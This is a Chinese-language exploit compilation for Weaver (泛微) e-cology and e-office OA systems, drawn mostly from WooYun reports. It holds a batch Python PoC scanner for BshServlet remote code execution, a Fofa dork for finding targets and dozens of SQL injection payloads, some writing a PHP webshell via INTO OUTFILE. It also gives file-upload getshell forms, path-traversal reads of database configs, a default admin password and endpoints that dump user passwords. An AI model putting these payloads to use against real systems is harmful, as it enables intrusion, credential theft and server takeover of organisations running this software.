• 安全研究


    接口

    /login/Login.jsp?logintype=1  #前台登录

    2019年
    泛微e-cology OA数据库配置信息泄漏
    包括不限于8.0、9.0版本
    /mobile/dbconfigreader.jsp

    2019年
    泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc)


    2019年 泛微e-cology OA系统远程代码执行

     Fofa Dork app="泛微-协同办公OA"0x02 影响范围

    包括但不限于7.0,8.0,8.1
    /weaver/bsh.servlet.BshServlet/

    单个|批量POC

    import requests
    import argparse

    def verify(url,payload):
    if 'http' not in url:
    url = 'http' + "://" + url

    Furl=url+"/weaver/bsh.servlet.BshServle"
    with open("Vuln_list.txt",'a') as Vlist:
    try:
    res = requests.post(Furl, data = payload)
    if res.status_code == 200:
    if "Error:" not in res.text:
    print(Furl + "is a vuln [Verify Success!] ")
    Vlist.write(url+' ')
    #
    # else:
    # print(str(res.status_code) + ' ' + Furl + ' ')
    except Exception:
    return

    def ecologyexp(urls,mode):
    payload={"bsh.script":"exec("whoami")","bsh.servlet.output":"raw"}
    if mode == '1':
    verify(urls,payload)
    elif mode == '2':
    with open(urls) as uFile:
    for url in uFile.readlines():
    try:
    verify(url, payload)
    except Exception as e:
    print(e)
    continue
    else:
    pass

    parser = argparse.ArgumentParser(description='e-cology verify',epilog="python2 e-cology-EXP.py -u url -m 1 || python2 e-cology-EXP.py -url url.txt -m 2")
    parser.add_argument('--url','-u',help='')
    parser.add_argument('--mode','-m',help='',default=1)
    parser.add_argument('--urlList','-ul',help='')
    parser.add_argument('--level','-lv',help='',default=1)
    args = parser.parse_args()

    if __name__ == '__main__':
    with open("vuln_list.txt",'w') as vF:
    vF.write("vuln_list ")

    try:
    if args.urlList is not None:
    ecologyexp(args.urlList,args.mode)
    else:
    ecologyexp(args.url, args.mode)
    except Exception as e:
    print(e)


    CNVD-2019-34241
    /mobile/browser/WorkflowCenterTreeData.jsp
    受影响版本
    泛微e-cology OA系统 JSP版本
    Payload:
    formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

    缺陷编号:wooyun-2015-0132247
    漏洞标题:泛微OA办公系统一处通用SQL注入(需要登陆)
    包含6.0及7.0版本
    /workflow/FormBillBrowser.jsp
    参数:formName 拼接sql未过滤


    wooyun-2015-0137850
    泛微OA系统通用任意文件上传getshell(附官方案例)
    影响6.0、7.0、7.100、8.0(需要登录)
    /page/maint/common/UserResourceUpload.jsp?dir=/
    (1)存在文件上传绕过(更改后缀:1.jsp.,1.jspx ; 0x00截断)
    (2)上传路径可控
    payload:
    <form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
    <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
    <button type=submit value="getshell">getshell</button> </form>


    wooyun-2015-0140003
    泛微OA通用系统三处SQL注入打包(官网可复现无需登录)
    (1)/mobile/plugin/loadWfGraph.jsp requestid
    (2)//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1 nodeid
    (3)//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2* id


    缺陷编号:wooyun-2016-0178866
    漏洞标题:泛微OA某接口无需登录可执行任意SQL语句(附脚本)
    /ws /ws/query?wsdl XML注入


    缺陷编号:wooyun-2016-0169872
    漏洞标题:泛微OA某处缺陷可遍历和操作系统文件
    pluginewejspconfig.jsp
    sUsername = "sysadmin";
    sPassword = "weaversoft"
    (1)/plugin/ewe/admin/default.jsp 新建文件1.txt
    (2)越权删除文件: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../


    wooyun-2015-0155705
    泛微OA未授权可导致GetShell
    /sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
    上传马路径:/sysinterface/extpage/ccccc.jsp
    路径可控:
    /sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp
    上传马路径:http://url/ccccc.jsp


    缺陷编号:wooyun-2015-0141834
    漏洞标题:雨润集团泛微OA系统表单任意上传拿shell
    /tools/SWFUpload/upload.jsp
    payload:
    <form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
    <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
    <button type=submit value="getshell">getshell</button> </form>
    上传马路径:http://url/shell.jsp


    缺陷编号:wooyun-2015-0138725
    漏洞标题:泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)
    /mobile/plugin/PreDownload.jsp url sql拼接未过滤


    缺陷编号:wooyun-2015-0132258
    漏洞标题:泛微OA系统存在SQL注入漏洞(附测试脚本)
    /ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= //keywordid Oracle 布尔盲注
    反射型XSS:/main/login.jsp
    Payload: 1'"()&%<ScRiPt >prompt(930551)</ScRiPt>


    缺陷编号:wooyun-2015-0129483
    漏洞标题:泛微OA系统敏感文件未授权访问
    /messager/users.data XML格式数据base64加密


    缺陷编号:wooyun-2015-0127502
    漏洞标题:泛微OA某处通用注入(不需登录)
    /web/WebSearchDsp.jsp?key=1 //key


    缺陷编号:wooyun-2015-0125738
    漏洞标题:泛微OA系统漏洞缺陷打包
    SQL注入(需登陆)
    (1)
    http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5 //requestid
    (2)
    /ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018 //reftype

    越权(需登陆)
    (1)
    /main/main.jsp 个人信息——》上传头像图片-》抓包捕获到get请求(该请求可在浏览器访问)
    /humres/base/uploadavatar.jsp?id=4022141241232(修改id即可修改他人头像)
    (2)
    /ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用户id&v=0&fieldName=isclosed //越权修改用户权限(v参数控制用户是否可以登陆-》sysuser表中isclosed字段)

    存储型XSS(需登陆)
    个人中心->个人信息->详细信息-》英文名称

    缺陷编号:wooyun-2015-0104678 (泛微oa的e-Mobile)
    漏洞标题:泛微oa某系统通用注入漏洞(5案例)
    4.5,4.6版本存在注入 盲注/延迟注入
    Payload:
    -1' OR (8705=8705) AND 'a'='a

    缺陷编号:wooyun-2014-076191
    漏洞标题:泛微OA漏洞集合·2(SQL注入/文件上传getshell)
    0x01:SQL注入漏洞 4 处
    (1)
    POST /general/new_mytable/content_list/
    content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
    block_id=1901&body_width=1121&_= //block_id
    (2)
    /general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 //ADD_ID
    (3)
    /general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16 //group_id
    (4)
    /general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1 //content_id

    0x02:文件上传导致Getshell
    /general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=
    //cvs --> php

    缺陷编号:wooyun-2014-074972
    漏洞标题:泛微OA漏洞集合(sql注入、未授权访问等)
    0x01:越权(需登陆)
    (1)
    /general/email/new/index.php?EMAIL_ID=7 //EMAIL_ID
    (2)
    /ikernel/admin/
    0x02:SQL注入(需登陆)
    (1)
    /ikernel/admin/IK_TABLE/field/?TABLE_ID=9 //TABLE_ID
    0x03:文件下载
    /general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
    0x04:文件上传
    /general/email/ 内部邮件-》新建邮件-》上传 “php4”
    shell验证:/attachment/源码中找到的部分路径/文件名.php4


    缺陷编号:wooyun-2014-069288
    漏洞标题:泛微OA系统通用后台几处注入(官方demo验证)
    (1)
    /systeminfo/sysadmin/sysadminEdit.jsp?id=1 //id 管理员权限
    (2)
    //cowork/CoworkLogView.jsp?id=151 //id 普通用户权限
    (3)
    /system/basedata/basedata_role.jsp?roleid=32 //roleid 普通用户权限
    (4)
    //system/basedata/basedata_hrm.jsp?resourceid=3 //resourceid 普通用户权限


    缺陷编号:wooyun-2013-039855
    漏洞标题:泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞
    (1)phpmyadmin #无需认证可登陆
    (2)SQL注入
    /general/news/show/read_news.php?NEWS_ID=214%20and%201=2%20union%20select%201,user(),database(),4,5,6 //NEWS_ID
    (3)文件下载
    /inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
    /inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 (zend加密)
    /inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/mysql_config.ini&ATTACHMENT_ID=5402024843

    (4)文件上传
    我的主页-》编辑工作计划-》附件上传-》php4
    shell地址:/attachment/xxx/shell.php4

    缺陷编号:WooYun-2015-0124589
    漏洞标题:泛微某通用系统存在SQL注入漏洞(无需登录)
    (1)
    /main/login.jsp 用户名:sysadmin' --》报错回显
    抓包:
    /j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin' //j_username
    (2)
    /ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version|20where|20rownum|20=|201 //可查看数据库版本

    wooyun-2015-0124788
    1.未授权访问及任意文件遍历
    /weaver/weaver.email.FileDownloadLocation?fileid=46&download=1
    /weaver/weaver.file.filedownload?fileid=1
    2.注入漏洞
    /weaver/weaver.email.FileDownloadLocation?fileid=39&download=1(泛微OA7) //fileid

    缺陷编号:WooYun-2013-038914
    漏洞标题:泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)
    文件上传
    分析inc/utility_all.php 的源码可知附件上传的路径为:attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME
    个人日志->上传附件,查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值
    从配置文件中可以知道,附件中未禁止php4格式的文件上传,因此可以直接getshell(system权限)


    wooyun-2015-0124027(sql语句任意执行)
    /ServiceAction/com.eweaver.base.DataAction?sql=select LONGONNAME from SYSUSER where LOGONPASS = '密码(base64加密)'


    applychen(wooyun-2010-034523)泛微E-office OA管理系统存在SQL注射漏洞(未找到相关信息)
    wooyun-2010-0137042(未找到相关信息)

    缺陷编号:wooyun-2016-0215533
    漏洞标题:泛微eweaver任意数据库操作
    /ws/query //webservice实现类QueryServiceImplquery中的queryBy可执行数据库命令

    缺陷编号:wooyun-2016-0191882
    漏洞标题:泛微ecology系统所有版本SQL注入(官网为例)二
    需普通用户权限
    影响范围:
    8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919

    缺陷编号:wooyun-2016-0198158
    漏洞标题:泛微ecology无需登录SQL注入2+任意文件读取
    (1)sql注入
    SignatureDownLoad类中 markId参数未做过滤
    (2)文件读取
    markPath参数可控


    缺陷编号:wooyun-2016-0169453
    漏洞标题:泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
    //services/ //XML注入


    缺陷编号:wooyun-2015-0164133
    漏洞标题:泛微e-office官网存在奇葩漏洞可查看注册人信息及更改产品信息
    /eoffice_web/index.php?s=/admin/settings/register.html
    /eoffice_web/index.php?s=/admin/update/update_list.html


    缺陷编号:wooyun-2015-0148980
    漏洞标题:泛微某通用系统设计缺陷遍历目录并可GetShell(需登录)
    1.目录遍历
    //document/imp/filebrowser.jsp?dir=D:\
    2.文件上传(需登陆)
    xxx/base/skin/skincreate.jsp
    shell路径:/css/skins/skin4/shell.jsp

    缺陷编号:wooyun-2015-0141786
    漏洞标题:无需登录sql注入泛微集团分权管理(e-cology)(某世界500强企业&demo复现)
    /login/Login.jsp?logintype=1
    登陆抓包-》
    /login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit= //loginid


    缺陷编号:wooyun-2015-0136818
    漏洞标题:泛微e-cology通用型4处SQL注入漏洞
    1 注入点 /pweb/careerapply/HrmCareerApplyPerEdit.jsp,参数id
    2 注入点 /pweb/careerapply/HrmCareerApplyPerView.jsp,参数id
    3 注入点 /pweb/careerapply/HrmCareerApplyWorkEdit.jsp,参数id
    4 注入点 /pweb/careerapply/HrmCareerApplyWorkView.jsp,参数id
    5 注入点 /web/careerapply/HrmCareerApplyPerEdit.jsp,参数id
    6 注入点 /web/careerapply/HrmCareerApplyPerView.jsp,参数id
    7 注入点 /web/careerapply/HrmCareerApplyWorkEdit.jsp,参数id
    8 注入点 /web/careerapply/HrmCareerApplyWorkView.jsp


    缺陷编号:wooyun-2015-0136823
    漏洞标题:泛微e-cology通用型6处SQL注入漏洞
    1 注入点 /web/broswer/SectorInfoBrowser.jsp,参数sqlwhere
    2 注入点 /web/broswer/CustomerTypeBrowser.jsp,参数sqlwhere
    3 注入点 /web/broswer/CustomerSizeBrowser.jsp,参数sqlwhere
    4 注入点 /web/broswer/CustomerDescBrowser.jsp,参数sqlwhere
    5 注入点 /web/broswer/ContacterTitleBrowser.jsp,参数sqlwhere
    6 注入点 /web/broswer/CityBrowser.jsp,参数sqlwhere


    缺陷编号:wooyun-2015-0136828
    漏洞标题:泛微某系统存在通用型注入(以官网和中国移动为例)
    (1)
    /login.do -》登录抓包 /verifyLogin.do //loginid
    payload:
    loginid: aaa' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a
    password: 1
    (2)
    /client.do?method=getlist&sessionkey=xxx&module=7&scope=4&pageindex=1&keyword=1 //keyword (需登录)

    缺陷编号:wooyun-2015-0134994
    漏洞标题:泛微e-cology通用性SQL注入漏洞(附脚本)
    /web/careerapply/HrmCareerApplyAdd.jsp //careerid


    缺陷编号:wooyun-2015-0130759
    漏洞标题:某OA平台系统泄露所有账户密码,包括管理员,无需登录(已进入泛微自己的管理系统)
    /ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER

    缺陷编号:wooyun-2015-0128007
    漏洞标题:泛微eoffice前台getshell+一处小问题(无需登录)
    (1)sql注入
    /inc/group_user_list/group_xml.php //par
    Payload:
    [group]:[1]|[groupid]:[1'] =》W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=
    [group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php'] =》W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==
    (2)未授权访问
    /UserSelect/main.php

    缺陷编号:wooyun-2015-0127270
    漏洞标题:泛微eoffice两处sql注入打包+一处越权(无需登录)
    (1)sql注入
    /E-mobile/calendar_page.php //detailid
    /E-mobile/diarymy_page.php //start
    Payload:
    1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
    (2)越权
    E-mobile/email_page.php //detailid

    缺陷编号:wooyun-2015-0126024
    漏洞标题:泛微E-office注入篇之无需登陆注射第1-20处(附官网案例)
    (1)
    /E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 //参数RUN_ID
    (2)
    /E-mobile/flowdo_page.php?diff=delete&flowid=1 //参数flowid
    (3)
    /E-mobile/flowsorce_page.php?flowid=2 //flowid
    (4)
    /E-mobile/flownext_page.php?diff=candeal&detailid=2,3 //参数detailid
    (5)
    /E-mobile/flowimage_page.php?FLOW_ID=2 //FLOW_ID
    (6)
    /E-mobile/flowform_page.php?FLOW_ID=2 //FLOW_ID
    (7)
    /E-mobile/diaryother_page.php?searchword=23 //searchword
    (8)
    /E-mobile/create/ajax_do.php?diff=word&sortid=1 //参数sortid
    (9)
    /E-mobile/create/ajax_do.php?diff=word&idstr=2 //参数idstr
    (10)
    /E-mobile/create/ajax_do.php?diff=addr&sortid=1 //参数sortid
    (11)
    /E-mobile/create/ajax_do.php?diff=addr&userdept=1 //参数userdept
    (12)
    /E-mobile/create/ajax_do.php?diff=addr&userpriv=1 //参数userpriv
    (13)
    /E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 //参数idstr
    (14)
    /E-mobile/flow/flowhave_page.php?detailid=2,3 //detailid
    (15)
    /E-mobile/flow/flowtype_free.php?flowid=1 //flowid
    (16)
    /E-mobile/flow/flowtype_free.php?runid=1 //runid
    (17)
    /E-mobile/flow/flowtype_other.php?flowid=1 //flowid
    (18)
    /E-mobile/flow/flowtype_other.php?runid=1 //runid
    (19)
    /E-mobile/flow/freeflowimage_page.php?fromid=2 //fromid
    (20)
    /E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 //参数runid


    缺陷编号:wooyun-2015-0125638
    漏洞标题:泛微Eoffice 某2个文件多处任意文件读取/多处任意文件上传可直接getshell
    文件读取
    (1)
    Payload:
    默认读取目录为/attachment/
    /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
    (2)
    Payload:
    默认读取目录为/attachment/
    /iweboffice/officeserver.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../mysql_config.ini
    (3)
    Payload:
    默认读取目录为/attachment/
    /iweboffice/officeserver.php?OPTION=GETFILE&REMOTEFILE=../mysql_config.ini
    文件上传
    (1)
    /iweboffice/officeserver.php?OPTION=SAVEFILE&FILENAME=shell.php
    shell路径:/attachment/shell.php
    (2)
    /iweboffice/officeserver.php?OPTION=SAVETEMPLATE&TEMPLATE=shell.php
    shell路径:/attachment/shell.php
    (3)
    case "SAVEASHTML"
    (4)
    case "SAVEIMAGE"
    (5)
    case "UPDATEFILE"
    (6)
    case "PUTFILE"
    (7)
    /webservice/upload/upload.php
    Payload:
    <form action="http://网站地址/ webservice/upload/upload.php" form enctype="multipart/form-data" method="POST">
    <input name="file" type="file">
    <input name="" type="submit">
    </form>
    (8)
    /webservice-json/upload/upload.php
    (9)
    /webservice-xml/upload/upload.php

    缺陷编号:wooyun-2015-0125592
    漏洞标题:泛微Eoffice 三处任意文件上传可直接getshell
    (1)
    /webservice/upload.php
    Payload:
    <form action="http://url/webservice/upload.php" form enctype="multipart/form-data" method="POST">
    <input name="file" type="file">
    <input name="" type="submit">
    </form>
    (2)
    inc/jquery/uploadify/uploadify.php
    Payload:
    <form action="http://url/ inc/jquery/uploadify/uploadify.php" form enctype="multipart/form-data" method="POST">
    <input name=" Filedata" type="file">
    <input name="" type="submit">
    </form>
    (3)
    /general/weibo/javascript/LazyUploadify/uploadify.php
    Payload:
    <form action="http://url/general/weibo/javascript/LazyUploadify/uploadify.php" form enctype="multipart/form-data" method="POST">
    <input name="Filedata" type="file">
    <input name="" type="submit">
    </form>
    (4)
    /general/weibo/javascript/uploadify/uploadify.php
    Payload:
    POST /general/weibo/javascript/uploadify/uploadify.php?uploadType=shell
    Content-Type: multipart/form-data; boundary=---------------------------94401197120954
    Content-Length: 214
    -----------------------------94401197120954
    Content-Disposition: form-data; name="Filedata"; filename="2.php"
    Content-Type: application/x-php
    <?php phpinfo();?>
    -----------------------------94401197120954--
    Shell路径: /attachment/shell.php
    (5)
    /general/weibo/javascript/uploadify/uploadify.php
    Payload:
    POST /general/weibo/javascript/uploadify/uploadify.php?user_ID=shell
    Content-Type: multipart/form-data; boundary=---------------------------94401197120954
    Content-Length: 214
    -----------------------------94401197120954
    Content-Disposition: form-data; name="Filedata"; filename="2.php"
    Content-Type: application/x-php
    <?php phpinfo();?>
    -----------------------------94401197120954--
    Shell路径: /attachment/personal/$userID/$userID_temp.php

    缺陷编号:wooyun-2015-0125279
    漏洞标题:泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)
    //webservice/eoffice.wsdl.php?wsdl (XML注入)

    缺陷编号:wooyun-2015-0125286
    漏洞标题:泛微e-office 任意文件下载
    /E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php


    缺陷编号:wooyun-2015-0125282
    漏洞标题:泛微E-office 3处sql注射(ROOT SHELL)/2处任意文件上传
    XML注入
    (1)
    webservice-json/login/login.wsdl.php?wsdl
    (2)
    /webservice/login/login.wsdl.php?wsdl
    (3)
    //webservice/eoffice.wsdl.php?wsdl
    /webservice/eoffice.wsdl.php?wsdl
    (4)
    /webservice-xml/login/login.wsdl.php?wsdl
    文件上传
    (1)
    /webservice/upload.php
    shell路径:attachment/$attachmentID $attachmentID 会回显
    (2)
    /webservice/upload/upload.php
    (3)
    webservice-json/upload/upload.php


    缺陷编号:wooyun-2015-0124503
    漏洞标题:泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台
    sql注入
    /client_converter.php //userAccount lang funcID
    越权
    步骤一:/client_converter.php?userAccount=admin&lang=cn(给session赋值)
    步骤二:/general/system/user/userlist.php

    缺陷编号:wooyun-2015-0112675
    漏洞标题:泛微的OA系统(泛微E-COLOGY)存在严重的信息安全漏洞
    /weaver/weaver.file.FileDownload?fileid=12


    缺陷编号:wooyun-2015-0105535
    漏洞标题:泛微Eoffice无需登录的SQL注入(多处)
    1
    /E-mobile/diarydo.php //diary_id
    2
    /E-mobile/notify_page.php //detailid
    3
    /E-mobile/emailreply_page.php //detailid
    4
    /E-mobile/sms_page.php //detailid
    5
    /E-mobile/source_page.php //emailid


    缺陷编号:wooyun-2015-0105520
    漏洞标题:泛微e-office无需登录GETSHELL
    /E-mobile/Data/login_other.php
    使用stripslashes进行反转义,导致可以绕过GPC进行注入
    Payload:
    /E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
    /e-mobile/Data/login_other.php?diff=sync&auth={%22auths%22:[{%22value%22:%22-1%27%20UNION%20SELECT%201,2,%27%3C?php%20phpinfo();%20?%3E%27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20into%20outfile%20%27D:/eoffice/webroot/shell.php%27%23%22}]}
    shell路径:http://url/shell.php

    缺陷编号:wooyun-2015-0105290
    漏洞标题:泛微e-office无需登录注入一枚
    /inc/priv_user_list/priv_xml.php //userpriv(数组型注入-需base64编码)

    缺陷编号:wooyun-2015-0104799
    漏洞标题:泛微Eoffice多个文件SQL注入续(无需登录)
    /E-mobile/flowimg.php //FLOW_ID RUN_ID


    缺陷编号:wooyun-2015-0104782
    漏洞标题:泛微Eoffice多个文件SQL注入(无需登录)
    (1)
    /eoffice/api/email.class.php //emailid
    (2)
    /E-mobile/source_page.php //emailid
    (3)
    /E-mobile/emailreply_page.php //emailid
    (4)
    /E-mobile/email_page.php //emailid

    缺陷编号:wooyun-2014-087500
    漏洞标题:泛微Eoffice无需登录直接getshell
    /mysql_config.ini


    缺陷编号:wooyun-2014-082627
    漏洞标题:泛微某系统通用型SQL注入漏洞打包(全版本)
    (1)
    /homepage/Homepage.jsp //hpid
    (2)
    /page/element/7/News.jsp //eid
    (3)
    /CRM/data/ViewCustomerBase.jsp //requestid
    (4)
    /page/element/compatible/view.jsp //eid
    (5)
    /page/element/Weather/View.jsp //eid
    (6)
    /proj/data/ViewProject.jsp //ProjID


    缺陷编号:wooyun-2014-078802
    漏洞标题:泛微e-cology系统又一sql注入(无需登录)
    homepage/LoginHomepage.jsp //hpid


    缺陷编号:wooyun-2014-078769
    漏洞标题:泛微e-cology存在sql注入(无需登录)
    /page/maint/login/Page.jsp //templateId

    缺陷编号:wooyun-2014-076547
    漏洞标题:泛微某系统漏洞集合(不拿shell不是合格的白帽子)
    //需登录
    漏洞模块为:我的邮件 -- 联系人 -- 导入 -- 以逗号为分隔符的CVS文件
    最终得到的文件路径为:http://url/email/csv/上传的文件名.jsp


    缺陷编号:wooyun-2014-072571
    漏洞标题:泛微eteams_oa系统越权修改任意用户信息
    //需登录

    缺陷编号:wooyun-2014-055521
    漏洞标题:泛微E-office OA管理系统通过sql注入可以任意真实用户名免密码登陆
    post请求,url为general/index.php,
    smsid为1 union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1',两者都经过DES3加密后再经过base64转码


    缺陷编号:wooyun-2013-034523
    漏洞标题:泛微E-office OA管理系统存在SQL注射漏洞可查库
    /general/file_folder/file_new/neworedit/index.php // CONTENT_ID

    日志未授权访问
    /log/ecology_date.log

    wooyun-2015-0125281(未找到相关信息)
